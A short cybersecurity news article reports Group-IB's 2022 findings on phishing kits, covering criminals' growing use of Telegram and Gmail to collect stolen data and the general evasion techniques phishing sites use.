Criminals now prefer Telegram for managing stolen information.
The majority of stolen data is handled by phishers via email, with Gmail being their email service of preference. But because Telegram gives users a great level of anonymity, criminals are also depending on it more and more.
A 25% rise over 2021 saw the cybersecurity firm Group-IB identify approximately 3,700 different phishing kits in 2022. A collection of tools used to execute extensive phishing campaigns is known as a phishing kit.
Threat actors frequently use email to handle stolen material. With 45% of phishers preferring Google’s tool to process the stolen data, Gmail continued to be the most widely used service.
However, Group-IB’s Computer Emergency Response Team (CERT-GIB) observed that there are now almost twice as many phishing kits using Telegram to gather stolen data. 9.4% of phishers handled information on Telegram in 2022.
The messenger’s flexibility and convenience allow cybercriminals to process and manage compromised information almost in real-time.
The Company said
The usage of Telegram by criminals is neither shocking nor new. In fact, since they provide a great level of privacy to individuals in need, many encrypted communication platforms, such as Signal and WhatsApp, are abused by thieves. demonstrators, whistleblowers, or dissidents, for instance.
Automated processes enable thieves to create and update hundreds of websites every day. Criminals concentrate on improving evasion skills in an effort to prolong the lifespan of those websites.
The most common basic access control methods are hypertext access (.htaccess) and robots.txt.
These are essentially configuration files that block access to the website for bots and search engine crawlers.
Cybercriminals also use a variety of more sophisticated evasion methods. Dynamic directories are one popular method of avoiding detection, for instance. This implies that a malicious link is personal and only the recipient can access it.
Also used by criminals are bogus 404 sites. If a user’s device parameters, geolocation, or referer do not match the victim’s profile, all they see is an error notice rather than a malicious website.
There are numerous off-the-shelf phishing kit solutions loaded with sophisticated detection evasion tactics, which makes a defender’s task even more difficult. It implies that phishing campaigns can be started by even inexperienced cybercriminals with limited technological skills.